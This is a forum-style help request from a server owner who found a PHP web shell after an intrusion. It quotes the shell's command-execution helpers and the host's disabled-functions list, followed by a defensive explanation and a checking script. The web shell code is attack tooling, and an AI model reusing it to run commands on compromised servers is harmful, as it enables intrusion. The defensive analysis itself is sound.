I had a problem on my server today and discovered malicious code which an attacker used to gain access to my system.
I downloaded that PHP script, but what was weird is that I saw functions which are disabled in my PHP configuration.
Disabled are: passthru, exec, shell_exec, system, among others.
How is that possible?
This is part of the code:
function get_execution_method()
{
    if(function_exists('passthru')){ $m = "passthru"; }
    if(function_exists('exec')){ $m = "exec"; }
    if(function_exists('shell_exec')){ $m = "shell_exec"; }
    if(function_exists('system')){ $m = "system"; }
    if(!isset($m)) //No method found :-|
    {
        $m = "Disabled";
    }
    return($m);
}
function execute_command($method,$command)
{
    if($method == "passthru")
    {
        passthru($command);
    }
    elseif($method == "exec")
    {
        exec($command,$result);
        foreach($result as $output)
        {
            print $output."\n";
        }
    }
    elseif($method == "shell_exec")
    {
        print shell_exec($command);
    }
    elseif($method == "system")
    {
        system($command);
    }
}
function perm($file)
{
    if(file_exists($file))
    {
        return substr(sprintf('%o', fileperms($file)), -4);
    }
    else
    {
        return "????";
    }
}
Just to be sure that there are no leftovers, I copied that script to a new account which no one has access to except me. There is no .htaccess file or php.ini. The script still works on that account. I created a phpinfo file to see the PHP configuration for that account, and here are the disabled functions:
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen
As you can see, the functions used in that script are among the disabled functions.
When I try to run some of the disabled functions I get this message:
Warning: system() has been disabled for security reasons in /home/user....
Just to make sure, I uploaded that script to a different server and the same was possible. That server also has the same disabled functions.
How can I prevent this from allowing someone access to my files?
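The mismatch described in the post, where function_exists() reports a function as present although disable_functions blocks it, is the documented behaviour of PHP before 8.0: function_exists() only checks that the function is compiled in, not whether the ini setting allows calling it (PHP 8.0 changed this so that disabled functions are treated as non-existent). The snippet below is an added example, not code from the original post, that an administrator can drop into a test page to see which of the probed functions would actually run under the current configuration. It assumes nothing beyond standard PHP: the helper names disabled_functions() and is_really_available() are chosen here.

```php
<?php
// Added example (not from the original post): consult disable_functions
// directly instead of trusting function_exists(), which on PHP < 8.0 still
// returns true for a function that the ini setting has disabled.

function disabled_functions(): array
{
    // disable_functions is a comma-separated list; normalise case and whitespace.
    $raw   = (string) ini_get('disable_functions');
    $names = array_filter(array_map('trim', explode(',', $raw)));
    return array_map('strtolower', $names);
}

function is_really_available(string $name): bool
{
    if (!function_exists($name)) {
        return false; // not compiled in at all
    }
    // Present in the engine, but is it blocked by configuration?
    return !in_array(strtolower($name), disabled_functions(), true);
}

// Report on the functions the script in the post probes for, plus the two
// process-spawning functions that appear in the phpinfo disabled list.
foreach (['passthru', 'exec', 'shell_exec', 'system', 'proc_open', 'popen'] as $fn) {
    printf(
        "%-10s function_exists=%-3s actually_available=%s\n",
        $fn,
        function_exists($fn) ? 'yes' : 'no',
        is_really_available($fn) ? 'yes' : 'no'
    );
}
```

On a PHP 7.x host with the disable_functions list shown in the post, every row prints function_exists=yes but actually_available=no, which is exactly the situation the post's get_execution_method() misreads; on PHP 8.0 or later both columns agree. Checking ini_get('disable_functions') (or the phpinfo output) rather than function_exists() is the reliable way to confirm the restriction is in force.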